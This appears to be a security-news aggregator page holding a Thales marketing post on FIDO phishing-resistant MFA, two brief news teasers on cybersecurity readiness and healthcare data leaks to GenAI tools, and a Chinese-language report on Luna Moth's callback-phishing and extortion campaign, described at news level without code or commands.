Aggregator

Phishing-Resistant MFA: Why FIDO is Essential
madhav
Thu, 05/08/2025 - 04:47

Phishing attacks are one of the most pervasive and insidious threats, with businesses facing increasingly sophisticated and convincing attacks that exploit human error. Traditional Multi-Factor Authentication (MFA), while a step up from password-only security, is no longer enough to fight modern phishing schemes.

Today’s threat actors use AI to craft compelling phishing campaigns and advanced social engineering tactics to slip past MFA, resulting in credential theft and account takeovers. As malefactors hone their methods, entities must adopt phishing-resistant multi-factor authentication to secure their digital identities.

The Fast Identity Online (FIDO) standard stands out as a robust solution that helps businesses implement authentication mechanisms that eliminate dependence on passwords and help mitigate phishing risks.

As malicious actors evolve their tactics, adding AI to their arsenal of malicious tools and automating and scaling their campaigns on an unprecedented scale, phishing remains a top initial attack vector. According to Thales’s 2024 Data Threat Report, 93% of Enterprises reported a rise in threats, and phishing was identified as one of the three fastest-growing attack types, chosen by 36% of respondents. AI-powered, highly convincing phishing can clone legitimate websites and manipulate users into divulging sensitive credentials and data.

Credential theft is particularly dangerous as it facilitates account takeovers, lateral movement within networks, and access to critical business systems. Attackers can leverage these stolen credentials to slip through perimeter defenses, compromise cloud environments, and carry out ransomware attacks.

High-profile breaches illustrate the devastating impact of credential-based attacks. For instance, a breach discovered in hospitalities businesses was reportedly initiated through social engineering tactics that exploited weak authentication controls. Similarly, the data breach that targeted a large technology company saw bad actors tricking an employee into giving MFA approval, highlighting the limitations of conventional MFA. These incidents stress the dire need for firms to adopt phishing-resistant multi-factor authentication mechanisms like FIDO.

To effectively fight phishing, authentication mechanisms must reduce the use of shared secrets, like passwords and codes, to eliminate the risk of credential interception and unauthorized access. Phishing-resistant MFA ensures that even if a bad actor deceives a user, they cannot get their hands on reusable credentials or compromise accounts.

FIDO standards provide a basis for strong authentication by replacing conventional passwords with cryptographic security keys. The key principles of FIDO authentication include:

• Public-key cryptography: Authentication relies on asymmetric cryptographic keys, preventing credential reuse or interception.
• Anti-Phishing: the private and public keys are bound to a specific service provider domain, if the domain is fake, the authentication fails.
• Device-bound passkeys: For high-risk scenarios, guarantee that authentication occurs only on the specific device where the passkey was originally generated. The device can be a hardware FIDO security key, a mobile phone or a laptop.
• Biometric and hardware-based security: the use of a biometric element such as a fingerprint instead of registering a PIN code can be offered to end users in order to facilitate and accelerate the FIDO adoption.

FIDO-based authentication addresses the risks associated with traditional MFA—one-time passcodes (OTPs) and push notifications—which can be intercepted or manipulated. Unlike conventional MFA, FIDO authentication ensures that credentials cannot be used outside the legitimate authentication flow, rendering phishing attacks ineffective.

Adopting unphishable MFA arms entities with a host of security and operational benefits, including:

• Better Security and User Experience: Passwords are ineffective, as people struggle to remember unique passwords for each account, which often results in weak passwords or the reuse of the same password across multiple platforms, compromising security. FIDO authentication streamlines the process, allowing users to authenticate securely with biometrics and/or hardware security keys without the risk of credential theft.
• Regulatory Compliance and Cybersecurity Framework Alignment: Many industry regulations, including the NIST Cybersecurity Framework, ISO 27001, GDPR, and DORA, stress the importance of strong authentication. FIDO-based solutions help firms meet compliance requirements while limiting the risk of data breaches.
• Lower Operational Costs: Password resets and account recovery processes are a hefty burden for IT teams, and replacing passwords with phishing-resistant authentication helps businesses dramatically cut support costs and improve workforce productivity.

Thales provides phishing-resistant authentication solutions that help businesses protect their digital identities. With a suite of FIDO-certified authentication devices, Thales enables companies to implement secure, scalable, and user-friendly identity security. Thales’ solutions integrate flawlessly with third parties or Thales identity and access management (IAM) frameworks, offering a future-proof approach to eradicating password-based vulnerabilities.

Phishing attacks are becoming more sophisticated, making traditional MFA insufficient for protecting digital identities. Organizations must adopt phishing-resistant MFA to mitigate credential theft and account takeovers. By leveraging Thales’ expertise in cybersecurity and identity protection, entities can stay ahead of evolving phishing threats and maintain compliance with industry regulations.

FIDO-based authentication gives firms a robust security framework, eliminating passwords and ensuring strong, phishing-proof access controls. Businesses looking to enhance security while improving user experience should explore Thales’ authentication solutions.

Download our Phishing-Resistant MFA eBook and Passwordless 360 Report to learn more.

Sarah Lefavrais | IAM Product Marketing Manager
More About This Author > Schema {
"@context": "https://schema.org",
"@type": "BlogPosting",
"mainEntityOfPage": {
"@type": "WebPage",
"@id": "https://cpl.thalesgroup.com/blog/access-management/fido-phishing-resistant-mfa-authentication"
},
"headline": "Why FIDO is Critical for Phishing-Resistant MFA",
"description": "Explore how FIDO-based MFA helps businesses eliminate phishing threats, enhance user security, and meet compliance standards with Thales solutions.",
"image": "",
"author": {
"@type": "Person",
"name": "Sarah Lefavrais",
"url": "https://cpl.thalesgroup.com/blog/author/slefavrais"
},
"publisher": {
"@type": "Organization",
"name": "Thales Group",
"description": "The world relies on Thales to protect and secure access to your most sensitive data and software wherever it is created, shared, or stored. Whether building an encryption strategy, licensing software, providing trusted access to the cloud, or meeting compliance mandates, you can rely on Thales to secure your digital transformation.",
"url": "https://cpl.thalesgroup.com",
"logo": "https://cpl.thalesgroup.com/sites/default/files/content/footer/thaleslogo-white.png",
"sameAs": [
"https://www.facebook.com/ThalesCloudSec",
"https://www.twitter.com/ThalesCloudSec",
"https://www.linkedin.com/company/thalescloudsec",
"https://www.youtube.com/ThalesCloudSec"
]
},
"datePublished": "2025-05-8",
"dateModified": "2025-05-8"
}

The post Phishing-Resistant MFA: Why FIDO is Essential appeared first on Security Boulevard.

Only 4% of organizations worldwide have achieved the ‘mature’ level of readiness required to withstand cybersecurity threats, according to Cisco’s 2025 Cybersecurity Readiness Index. This is a slight increase from last year’s index, in which 3% of organizations worldwide were designated as mature. This demonstrates that despite a slight improvement from last year, global cybersecurity preparedness remains low as hyperconnectivity and AI introduce new complexities for security practitioners. AI is changing the threat landscape AI … More →

The post Global cybersecurity readiness remains critically low appeared first on Help Net Security.

Healthcare organizations are facing a growing data security challenge from within, according to a new report from Netskope Threat Labs. The analysis reveals that employees in the sector are frequently attempting to upload sensitive information, including potentially protected health data, to unauthorized websites and cloud services. Among the most common destinations are AI tools like ChatGPT and Gemini. Healthcare GenAI data policy violations Over the past 12 months, 81% of all data policy violations in … More →

The post Healthcare workers regularly upload sensitive data to GenAI, cloud accounts appeared first on Help Net Security.

被称为Luna Moth的数据盗窃勒索组织，又名Silent Ransom group，已经加大了对美国法律和金融机构的回调网络钓鱼攻击力度。

据 EclecticIQ 研究员 Arda Büyükkaya 称，这些攻击的最终目的是窃取数据和实施勒索。

Luna Moth，内部称为 Silent Ransom Group，他们之前曾发起 BazarCall 活动，以便为 Ryuk 获取公司网络的初始访问权限，后来又发起 Conti 勒索软件攻击。

2022年3月，随着Conti开始关闭，BazarCall威胁组织从Conti集团中分离出来，成立了一个名为Silent Ransom Group （SRG）的新组织。

Luna moth最近的攻击包括通过电子邮件、虚假网站和电话冒充IT支持人员，并且完全依赖社会工程和欺骗，在任何情况下都没有部署勒索软件。

据安全公司评估，截至2025年3月，Luna Moth可能已经通过GoDaddy注册了至少37个域名，以支持其回调网络钓鱼活动。

这些域名中的大多数都是美国主要律师事务所和金融服务公司的IT帮助台或支持门户，使用的是键入的模式。

Luna Moth在过去12个月的目标

elecectiq发现的最新活动始于2025年3月，目标是美国的组织，这些组织发送恶意电子邮件，其中包含假的号码，收件人被敦促拨打电话解决不存在的问题。

一名Luna Moth操作员冒充IT人员接听电话，并说服受害者安装来自假IT帮助台网站的远程监控和管理（RMM）软件，使攻击者能够远程访问他们的机器。

虚假的帮助台网站使用域名，这些域名遵循像[company_name]-helpdesk.com和[company_name]helpdesk.com这样的命名模式。

虚假IT支持网站

在这些攻击中被滥用的工具包括Syncro、SuperOps、Zoho Assist、Atera、AnyDesk和Splashtop。这些都是合法的数字签名工具，所以它们不太可能触发对受害者的任何警告。

一旦安装了RMM工具，攻击者就可以动手访问键盘，允许他们传播到其他设备并搜索本地文件和共享驱动器以获取敏感数据。

找到有价值的文件后，他们使用WinSCP（通过SFTP）或Rclone（云同步）将这些文件泄露到攻击者控制的基础设施中。

数据被盗后，Luna Moth联系受害组织，威胁要在其清晰网域名上公开泄露数据，除非他们支付赎金。每个受害者的赎金金额各不相同，从100万美元到800万美元不等。

Luna Moth的勒索网站

Büyükkaya评论了这些攻击的隐蔽性，指出它们不涉及恶意软件、恶意附件或恶意软件网站的链接。受害者只是自己安装RMM工具，认为他们正在接受帮助台的支持。由于企业通常使用这些RMM工具，因此它们不会被安全软件标记为恶意工具，并允许运行，建议考虑限制在组织环境中不使用的RMM工具的执行。